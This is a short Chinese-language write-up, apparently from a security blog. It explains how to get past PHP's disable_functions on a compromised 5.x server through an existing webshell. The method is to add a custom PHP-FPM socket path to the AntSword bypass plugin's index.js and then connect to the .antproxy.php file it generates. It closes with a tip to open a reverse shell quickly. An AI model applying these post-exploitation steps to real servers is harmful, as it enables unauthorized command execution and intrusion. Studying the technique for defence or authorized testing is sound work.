请不要在未经授权在真实网络环境中复现本文章中描述的攻击。

🐎连上是5.x的情况大概就是这样。不出意料的,ban了很多命令执行函数。

访问🐜🗡绕过disable_functions插件的文件夹👉core👉php_fpm,在index.js中添加一行'/tmp/php-cgi-56.sock',位置如下:

            options: (() => {
              let vals = [
                '/tmp/php-cgi-56.sock',
                'unix:///var/run/php5-fpm.sock',
                'unix:///var/run/php/php5-fpm.sock',
                'unix:///var/run/php-fpm/php5-fpm.sock',
                'unix:///var/run/php/php7-fpm.sock',
                '/var/run/php/php7.2-fpm.sock',
                '/usr/local/var/run/php7.3-fpm.sock',
                'localhost:9000',
                '127.0.0.1:9000',
              ];

这次再使用绕过disable_functions插件就可以显示/tmp/php-cgi-56.sock了。

启动的WebServer根目录要记得选🐎的根目录:

显示成功。在🐎同级目录下会生成.antproxy.php

创建副本,连接.antproxy.php,可以执行命令了。

缺点也显而易见,维持时间不会太长,要弹shell记得快点。